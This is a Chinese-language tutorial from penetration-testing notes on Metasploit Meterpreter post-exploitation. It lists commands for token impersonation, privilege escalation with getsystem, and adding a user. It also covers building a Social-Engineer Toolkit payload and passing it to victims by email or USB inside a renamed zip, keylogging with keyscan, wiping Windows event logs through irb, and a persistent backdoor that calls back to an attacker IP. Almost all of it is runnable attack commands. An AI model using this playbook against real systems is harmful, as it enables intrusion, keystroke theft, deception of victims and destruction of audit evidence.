1、使用假冒令牌
1)、启动meterpreter会话,执行命令
sessions -i 1
2)、use incognito加载incognito模块,然后列举出令牌
3)、help查看帮助信息,了解列举令牌的命令
4)、list_tokens -u 列举出所有的令牌
5)、impersonate_token命令假冒用户进行攻击
impersonate_token user
2、本地权限提升
1)、启动meterpreter会话
sessions -i 1
2)、使用getsystem命令提升本地权限、
getsystem -h 查看该命令的帮助嘻嘻
3)、执行命令 getsystem提升权限(自动选择方法1)
4)add_user bob 1231 -h ip #创建用户
3、使用社会工程学工具包
1)、setoolkit 启动SET
2)、选择社会工程学,将显示如下信息
3)、创建一个攻击载荷和监听器,即输入编号4
输出信息显示了可生成的所有攻击载荷,根据目标系统选择相应的攻击载荷
4)、假设攻击的目标系统win,选择编号2
5)、将该过程与指定的ip和端口绑定,将打开一个handler,并生成payload,将ip地址与端口绑定,是因为主机上可能存在多个网卡,但是端口号是不可变的,这样监听器将等待被渗透攻击的系统来连接,并且负责这些网络连接
4、传递攻击载荷给目标系统
payload:是指用户系统目标系统在被渗透攻击之后执行的代码
例如:反弹shell是一种从目标系统到攻击主机创建的网络连接,并提供命令行shell的攻击载荷
Bind Shell攻击载荷则在目标系统上将命令行shell绑定到一个打开的监听端口,攻击者可以连接这些端口取得shell交互
1)、社会工程学工具的攻击载荷默认在/root/.set/payload.exe,将其发送到目标主机(邮件发送或者存储在U盘)
2)、mv payload.exe xx 修改文件名
3)、zip xxx payload.exe用zip命令压缩该文件
4)、当目标系统打开内容后,将在msf handler下建立一个活跃的会话
5、收集目标系统数据
1)激活meterpreter会话
sessions -i 1
2)开启键盘记录器
keyscan_start
3)收集目标系统中的数据
keyscan_dump
6、清除踪迹
1)激活meterpreter会话
sessions -i 1
2)irb 命令清除踪迹
输出信息中看到>>提示符,表示成功运行了irb命令
3)设置想要删除的日志,常用日志选项如下
log=client.sys.eventlog.open('system');
log=client.sys.eventlog.open('security');
log=client.sys.eventlog.open('application');
log=client.sys.eventlog.open('directory service');
log=client.sys.eventlog.open('dns server');
log=client.sys.eventlog.open('file replication service');
上述命令指定了要清除的日志,最后,log.clear清除日志文件
7、创建持久后门
1)激活meterpreter会话
sessions -i 1
2)查看帮助文档
run persistence -h
3)创建一个持久后门
run persistence -U -A -i 10 - 8090 -r $IP #将在目标系统中创建一个持久脚本,并且脚本将在目标主机上自动运行
参考书籍:Kali Linux渗透测试技术详解